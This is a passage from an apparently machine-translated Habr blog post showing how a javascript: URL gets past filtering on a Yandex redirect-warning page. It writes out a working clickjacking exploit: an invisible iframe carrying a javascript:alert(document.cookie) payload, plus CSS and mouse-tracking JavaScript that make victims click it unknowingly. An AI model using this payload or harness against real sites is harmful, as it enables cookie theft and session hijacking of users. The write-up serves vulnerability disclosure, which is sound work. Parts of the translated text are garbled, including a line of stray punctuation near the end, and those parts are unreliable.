"><script>alert('xss');</script>
and got into the source, see what is filtered and what is not. Here is a line in the source. <span onclick="return {'b\-form\-button':{name:'b\-form\-button', 'retpath': "\"><script>alert('xss')"}}"
Well, I think, boring, - everything is filtered. Then he looked more attentively and realized that Yandex does not add the protocol to the URL at first, here it is possible and to play. Introduced javascript: alert('xss');
- works! But unfortunately, only when you click on the "Return" button. You can try . Already more interesting, digging further ...
javascript:alert('ahoy!');
and click on the link. Works! Now we try to place the address with vulnerability in the iframe. Hooray! There are no checks. Try it . Great, go ahead.
<!DOCTYPE html> <html> <head> <style type="text/css"> body { margin:0; padding:0; } #helper { position: absolute; overflow: hidden; width: 200px; height: 13px; } #ifr { position: relative; top: -180px; left: -58px; } </style> </head> <body> <div id="helper"> <div style="width: 100%; height: 300px"> <iframe id="ifr" src="http://yandex.ru/redir_warning/?url=javascript:alert(document.cookie)" width="1000px" height="300" frameborder="no" scrolling="no" ></iframe> </div> </div> </body> </html>
var el; window.onload = function() { var ifr = document.getElementById("ifr"); // if(navigator.userAgent.toLowerCase().indexOf("webkit") != -1) { ifr.style.top = "-180px"; } else { ifr.style.top = "-190px"; } el = document.getElementById("helper"); window.onmousemove = onmove; } function onmove(e) { el.style.left = (e.pageX - 50) + "px"; el.style.top = (e.pageY - 12) + "px"; return false; }
<iframe id="yandex" src="http://yandex.ru/" width="100%" height="100%" frameborder="no"></iframe>
<div id="overlay"></div>
#helper { z-index: 20000; opacity: 0; } #yandex { z-index: 10; } #overlay { position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 20; }
, ! , . . -- , ... http://help.yandex.ru/
Source: https://habr.com/ru/post/126800/